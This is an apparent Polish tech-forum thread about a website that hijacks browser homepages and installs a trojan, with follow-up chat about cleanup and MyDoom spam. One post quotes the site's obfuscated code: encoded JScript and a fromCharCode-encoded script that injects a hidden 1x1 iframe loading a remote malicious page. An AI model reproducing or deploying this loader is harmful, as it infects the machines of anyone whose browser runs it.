wirus!!!

0

UWAGA!

Poniższy link odnosi się do parszywego ścierwa, które ni stąd ni z owąd zapaskudzi komputer.
Wszedłem na tą stronę bo ktoś powiedział, że u niego ta właśnie strona ustawia się jako strona domowa. Pomyślałem więc, że jak na nią wejdę to będę wiedział co takiego porobiła i będę umiał naprawić sytuację...

Niestety jak wszedłem na tą stronę to szlag jasny w dupe trafił mój komputer i chyba jutro będę musiał robić reinstal systemu...

Dlatego jak ktoś czuje, że jest na tyle silny to może se tam wejść, a innym naprawdę nie radzę!!!!!!!!!!!!!! i zdecydowanie nawet ODRADZAM!!

http://CUT_CUT_CUT.com/?homepage.com

0

Przecież nie od dziś wiadomo, że na takie strony się wchodzi spod Mozilli (nie jest tak zintegrowana z systemem jak IE i nie ma tylu dziur) z ustawionymi max. zabezpieczeniami - wtedy NIC się nie ma prawa stać...

0

no spoko panowie weszliście na stronę o której wiedzieliście, że może wam syfu narobić. Przecież zawsze można było sobie otworzyć stronkę spod np telneta zamiast najpierw przez przeglądarkę a ty taki mały ciekawy wycinek kodu jakby ktoś był zainteresowany :P

<początek>

<script
language="JScript.Encode">#@~^[email protected]#@&P~7lMPWhWa;w,'~hbx[GSRmMnlD+nK2;wv#
[email protected]#@&P~W!x^YbGx,/4GSnW2;a`[email protected]#@&P~,PKnWaEa NKm;:xO (WNH
k x+MuPHdP{[email protected]!G8N+^Y,[lDlx4DYwl&Jwdk
sKmCD+cmWszbU0KDhzm:C&1:[email protected]*[email protected]#@&~P~~KnGw!2RktGAv!~TS8~q~9G1EhxDR
[email protected]#@&~P)@#@&~,/[email protected]#@&dUkAAA==^#[email protected]</script>

<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,6 0,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,120,109,111,118,105,10 1,115,52,117,46,110,101,116,47,120,120,120,47,99,111,117,110,116,101,114,46,104,116,109,108, 39,32,119,105,100,116,104,61,39,49,39,32,104,101,105,103,104,116,61,39,49,39,32,109,97,114,10 3,105,110,119,105,100,116,104,61,39,48,39,32,109,97,114,103,105,110,104,101,105,103,104,116, 61,39,48,39,32,115,99,114,111,108,108,105,110,103,61,39,110,111,39,32,102,114,97,109,101,98,1 11,114,100,101,114,61,39,48,39,62,60,47,105,102,114,97,109,101,62,34,41,59));</script><script language="JScript.Encode">#@~[email protected]#@&\CMPWm,',[email protected]#@&\mD~CbNP{[email protected] #@&ODH ,\CD~sKm~',n/1l2nvYW2 WlDrKx 4D0#pP)^lDm4`#`I)@#@&7CD,Dx9U;:,',HCY4 MW;x9cHmY4 Mlx[Gs`bPC~O,18F8#[email protected]#@&9Gm!:[email protected]!b0DmhnPkYHVn'E[b/2Vmz) WUnrP/.^ {J4YD2=z&R1Vk13mrDRWsz[nsW{EQlbN_E 4YsVQVxBQsKmQBL.'E_nd1lwnc9WEsn Y M+6+DM+Mb_E[v_Mx[U!:_EEPSkND4xJ8!Z]EP4nbo4Y{[email protected]*@[email protected]*v*[email protected]#@&PmcAAA ==^#[email protected]</script> <koniec> // he he, a potrafisz ten kod zinterpretować?? - ŁF
0

jak ktoś mi pisze, żebym nie właził, to włażę. oczywiście IE, nie Mozilla, bo by nie było zabawy.

no i co... pojawił się jakiś nowy proces, to go zatłukłem, poprzestawiał stronę startową i ulubione, oraz coś namieszał w plikach systemowych (ale z tym w2k+płyta instalacyjna radzą sobie same) - teraz pracuje mks i jak na razie nic nie znalazł. więc - za kilka dni, jak zrestartuję kompa, to się podzielę wrażeniami. bo na razie jest spoko.

wirus wrzucił do system32 plik rundll32.vbe - to nawet mks znalazł, coś majstrował z plikami nt\OLDAC.*, system\sysapp.exe i winlogon.exe (ten ostatni eNTek sam naprawił), oraz zresetował plik hosts (no fajnie, a ja tak się namęczyłem i tyle serwerów tam poblokowałem!).

ogólnie wirus (trojan raczej) średnio agresywny, ale wku**a mnie to, że IE pozwala na ściąganie i uruchamianie dowolnych plików z internetu. a przecież nie usunę obsługi JS!

no, więc proponuję nowy konkurs pod tytułem DELETE ME (tym razem dla hardkorowców) - kto wejdzie na tą stronę i "zainstaluje" sobie tego wirusa, po czym szybciej go usunie (-8
czas do pobicia - ~20 minut.

0

no, więc proponuję nowy konkurs pod tytułem DELETE ME (tym razem dla hardkorowców) - kto wejdzie na tą stronę i "zainstaluje" sobie tego wirusa, po czym szybciej go usunie (-8
czas do pobicia - ~20 minut.

To chyba ten sam co w: http://4programmers.net/Forum/viewtopic.php?id=48733 ?

W taki razie zajęło mi to jakieś 7 minut (z czego 5 pracwał mks, a jedną sciągałem WTOP'a :) ) Wtop był potrzebny bo robak po chamsku zabija taskmgr.exe z Xp.

// sprawdź, czy to ten sam... ;-) ja idę spać - ŁF

0

co do wirusów... ja bym prosił wszystkich forumowiczów o usunięcie wirusa Mydoom, ja dostaję już średnio 4 sztuki dziennie :) na emaila którego tutaj też podałem...

0

Powiedz co z nim zrobić.. najnowsza aktualizacje anmtywira nie chcą go łapać a też dostaje kilka dziennie + Elene..

0

Powiedz co z nim zrobić.. najnowsza aktualizacje anmtywira nie chcą go łapać a też dostaje kilka dziennie + Elene..

No właśnie, chciałem się poradzić odnośnie tego Worm.MyDoom.A...

Rzecz w tym że przeczytałem o nim trochę i nic nie wskazuje żeby
u mnie był, dwa razy skanowałem sobie dysk na www.mks.com.pl
co prawda miałem na nim chyba 23 wirusy/robaki ;-) , ale MyDooma
ani śladu i wszystkie procesy sprawdziłem i autostarty, no i nic,
a jednak wciąż dostaje maile w stylu: w twojej wiadomości wysłanej
na adres ...blablabla... odnaleziono wirusa MyDoom.A, a te adresy
to w ogóle takich nie mam w książce adresowej...

O co biega ?

0

wciąż dostaje maile w stylu: w twojej wiadomości wysłanej
na adres ...blablabla... odnaleziono wirusa MyDoom.A, a te adresy
to w ogóle takich nie mam w książce adresowej...
O co biega ?

Wirusik, który jest u kogoś wynalazł sobie u tego kogoś Twój mail i podał go w ścieżce zwrotnej w mailu, stąd te maile. Don't worry ja też takie dostałem (ze 3) i inne osoby też.

0

Don't worry ja też takie dostałem (ze 3) i inne osoby też.

Ale to k*** trochę irytujące, jak połowa poczty to informacje, że list, który wysłałem na adres, który widzę po raz pierwszy na oczy, ma wirusa, i że mam sobie sprawdzić komputer.
przy czym połowa poczty u mnie to trochę więcej niż jeden mail, więc już mnie kurwica bierze.

1 użytkowników online, w tym zalogowanych: 0, gości: 1, botów: 0